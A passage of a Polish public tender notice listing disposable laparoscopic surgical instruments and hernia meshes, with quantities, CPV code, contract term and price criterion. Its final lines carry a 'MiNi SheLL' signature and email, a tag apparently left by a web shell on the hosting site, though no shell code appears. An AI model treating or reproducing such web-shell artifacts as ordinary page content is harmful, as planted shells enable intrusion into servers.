2.3.	Trokar 5- 12 mm, jednorazowego użytku z bezpiecznym ostrzem i zintegrowanym systemem uszczelek, kaniula stabilizowana, dł tulei 100mm. Trokar musi posiadać wbudowany trójpozycyjny zawór pozwalający na insuflację i desuflację dwutlenku węgla do i z jamy brzusznej - 20 szt.<br>
2.4.	Kaniule jednorazowego użytku śr. 5, 11, 12mm, dł 100mm, kaniule stabilizowane z utrzymującym w powłokach skórnych ożebrowaniem, uszczelka zabezpieczająca przed utratą odmy, wbudowany trójpozycyjny zawór służący do insuflacji i desuflacji - 150 szt.<br>
2.5.	Nożyczki laparoskopowe, jednorazowe, śr 5 mm, odgięte z możliwością koagulacji monopolarnej i rotacji 360 stopni - 50 szt.<br>
2.6.	Jednorazowe kleszczyki chwytne typu disektor, zakrzywione bez mechanizmu blokującego, śr. 5 mm, dł. 31 -33cm	 - 50 szt.<br>
2.7.	Jednorazowy worek na pobrany materiał do trokaru 10mm z pełną rozkładaną obręczą, pojemność ok. 190 ml - 120 szt.<br>
2.8.	Jednorazowy worek na pobrany materiał do trokaru 15mm z pełną rozkładaną obręczą, pojemność ok. 1500ml - 10 szt.<br>
2.9.	Jednorazowa igła Weressa, stalowa, 120mm dł, 14 G kaliber, z wskaźnikiem bezpieczeństwa - 12 szt.<br>
2.10.	Klipsownica automatyczna śr 5mm, dł trzonu 33 cm, jednorazowego użytku z tytanowymi klipsami, rozmiar klipsa 8,9 - 9,1 mm z systemem pozwalającym preparowanie narzędziem - 18 szt.<br>
2.11.	Szew pętlowy z nitką wchłanialną o całkowitej hydrolizie w około 70 dni i grubości 2/0 - 50 szt.<br>
2.12.	Instrument jednorazowego użytku do mocowania siatek przepuklinowych z 30 tytanowymi wkrętami, wysokość aktywna 3,8 mm, śred. Aplikatora 5 mm, dł 35,5 cm - 40 szt.<br>
2.13.	Stapler przegubowy kąt 22, 45, 65 stopni do mocowania siatki , rotacja do 360 stopni, średnica 12 mm, 10 zszywek w ładunku, rozmiar otwartej zszywki 4,0mm, zamkniętej 3,0 mm - 6 szt.<br>
2.14.	Ładunki do staplera przegubowego, 10 zszywek w ładunku, otwarta zszywka 4,8 mm, zamknięta 3,0mm - 50 szt.<br>
2.15	Urządzenie do przeprowadzania nici kierunkowych - 12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa siatek antyadhezyjnych brzusznych i narzędzi do implantacji - Zadanie Nr 3..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Siatka antyadhezyjna brzuszna<br>
1.1. 	Siatka elastyczna, składająca się z niewchłanialnej, mikroporowej siatki polipropylenowej, pokryta z obu stron warstwą separującą w postaci wchłanialnego poliglekapronu i polidwuoksanu. Przezroczysta ze znacznikiem ułatwiającym orientację podczas implantacji<br>
rozmiar:<br>
- 15 x 15 cm - 30 szt.<br>
- 20 x 25 cm - 6 szt. <br>
1.2. 	Lekka, częściowo wchłanialna siatka do operacyjnego leczenia przepuklin brzusznych, składająca się z dwóch rodzajów nici jednowłóknowych, z których jedna jest barwiona i ulega wchłonięciu, a druga nie, pozostawiając w ten sposób szkielet przeznaczony do wsparcia tkanek przy długoterminowej stabilizacji struktur powięziowych ściany brzusznej. Pakowana podwójnie i zaopatrzona w tzw. paszport dwustronnego naklejania. Rozmiar 15 x 15 cm - 10 szt.<br>
2. Narzędzia do implantacji<br>
2.1.	Trokar 5 mm z bezpiecznym ostrzem, żebrowana, niegwintowana, przezierna kaniula ze ściętym szczytem, główka niskoprofilowa, zintegrowany system uszczelek, uniwersalna redukcja dł. kaniuli 100mm - 80 szt.<br>
2.2.	Trokar 11 mm z bezpiecznym ostrzem, żebrowana, niegwintowana, przezierna kaniula ze ściętym szczytem, główka niskoprofilowa, zintegrowany system uszczelek, uniwersalna redukcja, dł kaniuli 100mm - 80 szt.<br>
2.3.	Trokar 12 mm z bezpiecznym ostrzem, żebrowana, niegwintowana, przezierna kaniula ze ściętym szczytem, główka niskoprofilowa, zintegrowany system uszczelek, uniwersalna redukcja, dł kaniuli 100mm - 30 szt.<br>
2.4.	Trokary bez ostrzy z bocznymi separatorami tkanek i elementem optycznym, żebrowana, niegwintowana przezierna kaniula, ze ściętym szczytem, główka niskoprofilowa, rozmiar, 5mm, 11mm, 12mm - 80 szt.<br>
2.5.	Endoskopowa klipsownica wielostrzałowa, zawierająca 20 tytanowych klipsów, przesuwających się automatycznie po każdej aplikacji, posiadająca mechanizm zapadkowy oraz szczęki ustawione kątowo, ramie obrotowe 360 st., 12mm śr. 34cm dł., klipsy duże, wys. otwartego klipsa 4,2 mm, jednorazowa, sterylna - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com